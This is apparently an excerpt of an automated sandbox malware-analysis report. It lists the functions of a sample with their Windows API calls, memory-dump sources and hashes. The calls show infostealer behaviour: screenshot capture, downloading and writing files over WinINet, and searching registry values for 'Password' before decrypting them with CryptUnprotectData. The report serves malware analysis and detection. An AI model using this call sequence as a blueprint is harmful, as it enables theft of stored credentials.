                              Function 007D41E0 Relevance: 16.7, APIs: 11, Instructions: 177COMMON
                              Download Yara Rule
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,007D0CF0), ref: 007D4276
                              • GetDesktopWindow.USER32 ref: 007D4280
                              • GetWindowRect.USER32(00000000,?), ref: 007D428D
                              • SelectObject.GDI32(00000000,00000000), ref: 007D42BF
                              • GetHGlobalFromStream.COMBASE(007D0CF0,?), ref: 007D4336
                              • GlobalLock.KERNEL32(?), ref: 007D4340
                              • GlobalSize.KERNEL32(?), ref: 007D434D
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                              • String ID:
                              • API String ID: 1264946473-0
                              • Opcode ID: d37a54c265e3f06402f321978c079f8359da11773c7097928b81a3b7ec0343c8
                              • Instruction ID: d2af3d2a78f60748cfa9bdff36fa463f815a428435e2bbd152a563e0c45f7278
                              • Opcode Fuzzy Hash: d37a54c265e3f06402f321978c079f8359da11773c7097928b81a3b7ec0343c8
                              • Instruction Fuzzy Hash: E6513D75A20209EFDB10DFA4DC89AEEB7B9EF48311F104519F905B7251DB34AE01DBA0
                              Function 007CDFA0 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcat.KERNEL32(?,0145DEB8), ref: 007CE00D
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 007CE037
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CE06F
                              • lstrcat.KERNEL32(?,00000000), ref: 007CE07D
                              • lstrcat.KERNEL32(?,?), ref: 007CE098
                              • lstrcat.KERNEL32(?,?), ref: 007CE0AC
                              • lstrcat.KERNEL32(?,0144B2B0), ref: 007CE0C0
                              • lstrcat.KERNEL32(?,?), ref: 007CE0D4
                              • lstrcat.KERNEL32(?,0145D1C0), ref: 007CE0E7
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CE11F
                              • GetFileAttributesA.KERNEL32(00000000), ref: 007CE126
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                              • String ID:
                              • API String ID: 4230089145-0
                              • Opcode ID: 766e3c98943cd41f65a513acea89f24946f46386d63282feb1c46f8bcf2dae5c
                              • Instruction ID: 71e616b6da44e950730e6d9263cf792589d997291161335edf7568d5a5a555f0
                              • Opcode Fuzzy Hash: 766e3c98943cd41f65a513acea89f24946f46386d63282feb1c46f8bcf2dae5c
                              • Instruction Fuzzy Hash: F461B17191111CEBCB55DF64CC88BDD73B4BF88300F5089A8AA0AA7251DB749F859F90
                              Function 007B6AD0 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B6AFF
                              • InternetOpenA.WININET(007DCFEC,00000001,00000000,00000000,00000000), ref: 007B6B2C
                              • StrCmpCA.SHLWAPI(?,0145E360), ref: 007B6B4A
                              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 007B6B6A
                              • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 007B6B88
                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 007B6BA1
                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 007B6BC6
                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 007B6BF0
                              • CloseHandle.KERNEL32(00000000), ref: 007B6C10
                              • InternetCloseHandle.WININET(00000000), ref: 007B6C17
                              • InternetCloseHandle.WININET(?), ref: 007B6C21
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                              • String ID:
                              • API String ID: 2500263513-0
                              • Opcode ID: febc4880f6b0af0e2db411917cb2f609e9c01b9b794fd54cf5e3b40ad76d6069
                              • Instruction ID: 7763aa7d0c1f79035aa9460563efa9f3d52e6fd614190d4d4a2312a46861f0e3
                              • Opcode Fuzzy Hash: febc4880f6b0af0e2db411917cb2f609e9c01b9b794fd54cf5e3b40ad76d6069
                              • Instruction Fuzzy Hash: DB416FB1610205ABDB20DFA4DC89FEF77B9EB04701F104554FA05EB280EF78AD419BA4
                              Function 007BBBF9 Relevance: 15.2, APIs: 12, Instructions: 249stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007BBC1F
                              • lstrlen.KERNEL32(00000000), ref: 007BBC52
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BBC7C
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007BBC84
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007BBCAC
                              • lstrlen.KERNEL32(007E4AD4), ref: 007BBD23
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$lstrcat
                              • String ID:
                              • API String ID: 2500673778-0
                              • Opcode ID: b29dbba1cd7264dec0a878fd64109a36246d4847a9cdda2470cd8b579d29f255
                              • Instruction ID: d6f3ae4094aff1ea3d073dc052602382d864f9cbc14156165462198ef5d240d8
                              • Opcode Fuzzy Hash: b29dbba1cd7264dec0a878fd64109a36246d4847a9cdda2470cd8b579d29f255
                              • Instruction Fuzzy Hash: 20A13F30615205CFCB25DF68D989BEEB7B5AF44305F188469E80AEB362DB79DC42CB50
                              Function 007D5EE0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 215COMMON
                              Download Yara Rule
                              APIs
                              • std::_Xinvalid_argument.LIBCPMT ref: 007D5F2A
                              • std::_Xinvalid_argument.LIBCPMT ref: 007D5F49
                              • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 007D6014
                              • memmove.MSVCRT(00000000,00000000,?), ref: 007D609F
                              • std::_Xinvalid_argument.LIBCPMT ref: 007D60D0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_$memmove
                              • String ID: invalid string position$string too long
                              • API String ID: 1975243496-4289949731
                              • Opcode ID: ef587f7ab07264e00dd1f5b06cbf00b8918cb6aecc43bdd9a79fb9e3bacf8049
                              • Instruction ID: 2b48ce3021fecf07fae4928f9ab69ba1f1aa79f7c8446b71c2eaedc357bd86ab
                              • Opcode Fuzzy Hash: ef587f7ab07264e00dd1f5b06cbf00b8918cb6aecc43bdd9a79fb9e3bacf8049
                              • Instruction Fuzzy Hash: E8617F70B00544DBDB18CF5CC8D5D6EB7B6EF84304B284A5AE4928B782E739ED80CB95
                              Function 007CE049 Relevance: 13.6, APIs: 9, Instructions: 124stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CE06F
                              • lstrcat.KERNEL32(?,00000000), ref: 007CE07D
                              • lstrcat.KERNEL32(?,?), ref: 007CE098
                              • lstrcat.KERNEL32(?,?), ref: 007CE0AC
                              • lstrcat.KERNEL32(?,0144B2B0), ref: 007CE0C0
                              • lstrcat.KERNEL32(?,?), ref: 007CE0D4
                              • lstrcat.KERNEL32(?,0145D1C0), ref: 007CE0E7
                              • lstrcpy.KERNEL32(00000000,?), ref: 007CE11F
                              • GetFileAttributesA.KERNEL32(00000000), ref: 007CE126
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$AttributesFile
                              • String ID:
                              • API String ID: 3428472996-0
                              • Opcode ID: 16119ad5b235406b57e7fd83ede423a3f7bd7428220960cc16d414f59570424f
                              • Instruction ID: 6f99d44bf7c154154a71f04facf82c16213456407638c7f5a0986c3bcaa53ee7
                              • Opcode Fuzzy Hash: 16119ad5b235406b57e7fd83ede423a3f7bd7428220960cc16d414f59570424f
                              • Instruction Fuzzy Hash: D3418B7192111CDBCB25EF64DC88BDD73B4BF48300F5489A8B90AA7251DB389F868F90
                              Function 007B7A60 Relevance: 13.6, APIs: 8, Strings: 1, Instructions: 109stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007B77D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 007B7805
                                • Part of subcall function 007B77D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 007B784A
                                • Part of subcall function 007B77D0: StrStrA.SHLWAPI(?,Password), ref: 007B78B8
                                • Part of subcall function 007B77D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 007B78EC
                                • Part of subcall function 007B77D0: HeapFree.KERNEL32(00000000), ref: 007B78F3
                              • lstrcat.KERNEL32(00000000,007E4AD4), ref: 007B7A90
                              • lstrcat.KERNEL32(00000000,?), ref: 007B7ABD
                              • lstrcat.KERNEL32(00000000, : ), ref: 007B7ACF
                              • lstrcat.KERNEL32(00000000,?), ref: 007B7AF0
                              • wsprintfA.USER32 ref: 007B7B10
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B7B39
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007B7B47
                              • lstrcat.KERNEL32(00000000,007E4AD4), ref: 007B7B60
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                              • String ID: :
                              • API String ID: 398153587-3653984579
                              • Opcode ID: 6c56654342c0d67cc87ab51e175deab964994a48c26df411c64f51e9d62c7c83
                              • Instruction ID: a6203fe077ed7093c3409f5413883868ee8f7af3902b8508c737b3ebf9c52772
                              • Opcode Fuzzy Hash: 6c56654342c0d67cc87ab51e175deab964994a48c26df411c64f51e9d62c7c83
                              • Instruction Fuzzy Hash: 3431B7B2918154DFCB14DBA8DC84AEFB779EBC8715B14451DE509A7200DB78ED01EB90
                              Function 007C81B0 Relevance: 12.7, APIs: 10, Instructions: 175stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(00000000), ref: 007C820C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C8243
                              • lstrlen.KERNEL32(00000000), ref: 007C8260
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C8297
                              • lstrlen.KERNEL32(00000000), ref: 007C82B4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C82EB
                              • lstrlen.KERNEL32(00000000), ref: 007C8308
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C8337
                              • lstrlen.KERNEL32(00000000), ref: 007C8351
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C8380
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: abc966bec2bc05da09c03270c20686b09fbfdcd0dc98dff500b0f94acca1099e
                              • Instruction ID: b924ca2cd4de22c14bd26cca2b807fa8fd58f60c3de0514be56873fcf9e7b9f2
                              • Opcode Fuzzy Hash: abc966bec2bc05da09c03270c20686b09fbfdcd0dc98dff500b0f94acca1099e
                              • Instruction Fuzzy Hash: DF516C71901602DBEB54DF78D898BAEB7A8EF44700F114518AD06EB245EB38ED51CBE1
                              Function 007B77D0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 208registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 007B7805
                              • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 007B784A
                              • StrStrA.SHLWAPI(?,Password), ref: 007B78B8
                                • Part of subcall function 007B7750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 007B775E
                                • Part of subcall function 007B7750: RtlAllocateHeap.NTDLL(00000000), ref: 007B7765
                                • Part of subcall function 007B7750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 007B778D
                                • Part of subcall function 007B7750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 007B77AD
                                • Part of subcall function 007B7750: LocalFree.KERNEL32(?), ref: 007B77B7
                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007B78EC
                              • HeapFree.KERNEL32(00000000), ref: 007B78F3
                              • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 007B7A35
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
